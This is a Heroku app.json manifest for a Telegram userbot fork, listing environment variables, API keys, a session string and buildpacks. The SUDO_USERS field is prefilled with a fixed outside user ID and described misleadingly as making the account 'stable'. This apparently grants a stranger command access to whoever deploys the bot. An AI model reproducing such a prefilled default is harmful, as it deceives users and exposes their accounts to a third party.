{
  "name": "Uniborg Extended",
  "description": "Only for ultra legends A custom fork by @rajdeshmukh7",
  "logo": "https://telegra.ph/file/797acacdbfe43cac4c992.jpg",
  "keywords": [
    "telegram",
    "userbot",
    "plugin",
    "modular",
    "productivity"
  ],
  "repository": "https://github.com/rajdeshmukh7/Uniborg-extended/",
  "website": "#TODO",
  "success_url": "#TODO",
  "env": {
    "ENV": {
      "description": "Setting this to ANYTHING will enable heroku.",
      "value": "ANYTHING"
    },
    "TEMP_DOWNLOAD_DIRECTORY": {
      "description": "Where downloaded files will go.",
      "value": "./userbot/DOWNLOADS/",
      "required": false
    },
    "APP_ID": {
      "description": "Get this value from my.telegram.org! Please do not steal",
      "value": ""
    },
    "API_HASH": {
      "description": "Get this value from my.telegram.org! Please do not steal",
      "value": ""
    },
    "STRING_SESSION": {
      "description": "Get this value by running python3 telesetup.py locally",
      "value": ""
    },
    "REM_BG_API_KEY": {
      "description": "Get your own API key from https://www.remove.bg/ or feel free to use http://telegram.dog/Remove_BGBot",
      "required": false
    },
    "PRIVATE_GROUP_BOT_API_ID": {
      "description": "Send .get_id in any group to fill this value.",
      "value": "-100",
      "required": false
    },
    "PRIVATE_CHANNEL_BOT_API_ID": {
      "description": "Send .get_id in any channel to fill this value. ReQuired for @Manuel15 inspiration to work!",
      "value": "-100",
      "required": false
    },
    "GITHUB_ACCESS_TOKEN": {
      "description": "Your Github Access Token for gitcommit plugin.Google 'Github access token' to find.",
      "value": "",
      "required": false
    },
    "GIT_REPO_NAME": {
      "description": "Your repo name Example: Total-Noob-69/X-Tra-Telegram, but GITHUB_ACCESS_TOKEN must be setup first.",
      "value": "",
      "required": false
    },
    "LYDIA_API_KEY": {
      "description": "Needed for Lydia AI. Follow https://telegra.ph/Lydia-09-05 to get your API.",
      "value": "",
      "required": false
    },
    "HEROKU_API_KEY": {
      "description": "Go to https://dashboard.heroku.com/account, scroll down and press Reveal API.Required for updater to work.",
      "value": "",
      "required": false
    },
    "SUDO_USERS": {
      "description": "Makes your acc and bot stable",
      "value": "742506768",
      "required": false
    },
    "OCR_SPACE_API_KEY": {
      "description": "Get an API Key from http://OCR.Space",
      "required": false
    },
    "SCREEN_SHOT_LAYER_ACCESS_KEY": {
      "description": "Get your own ACCESS_KEY from http://api.screenshotlayer.com/api/capture",
      "required": false
    },
    "HEROKU_APP_NAME": {
      "description": "The Value of App Name you filled in right on top.Required for updater to work.",
      "value": "",
      "required": false
    },
    "TG_BOT_TOKEN_BF_HER": {
      "description": "Needed for inline buttons maker. Make a bot at [BotFather](http://telegram.dog/BotFather) and get the token of your bot.Worth it. Get it.",
      "value": "",
      "required": false
    },
    "CHROME_BIN": {
      "description": "For Carbon.py. Leave as it is. ",
      "value": "/app/.apt/usr/bin/google-chrome",
      "required": false
    },
    "CHROME_DRIVER": {
      "description": "For Carbon.py. Leave as it is. ",
      "value": "/app/.chromedriver/bin/chromedriver",
      "required": false
    },
    "TG_BOT_USER_NAME_BF_HER": {
      "description": "Needed for inline buttons maker. Make a bot at [BotFather](http://telegram.dog/BotFather) and get the username of your bot",
      "value": "",
      "required": false
    },
    "DOWNLOAD_PFP_URL_CLOCK": {
      "description": "Needed for autopic module. A url that is a preview link of your Profile Pic",
      "value": "",
      "required": false
    },
    "ALIVE_NAME": {
      "description": "Your Telegram Username. ",
      "value": "",
      "required": false
    },
    "TZ": {
      "description": "Required for Correct Time on autopic/get time. Know your timezone from http://www.timezoneconverter.com/cgi-bin/findzone.tzc",
      "value": "",
      "required": false
    }
  },
  "addons": [{
    "plan": "heroku-postgresql",
    "options": {
      "version": "9.5"
    }
  }],
  "buildpacks": [{
    "url": "https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest"
  },{
    "url":"https://github.com/amivin/aria2-heroku.git"
  },{
    "url":"https://github.com/heroku/heroku-buildpack-google-chrome"
  },{
    "url":"https://github.com/heroku/heroku-buildpack-chromedriver"
  },{
    "url": "https://github.com/opendoor-labs/heroku-buildpack-p7zip"
  },{
    "url": "heroku/python"
  }]
}
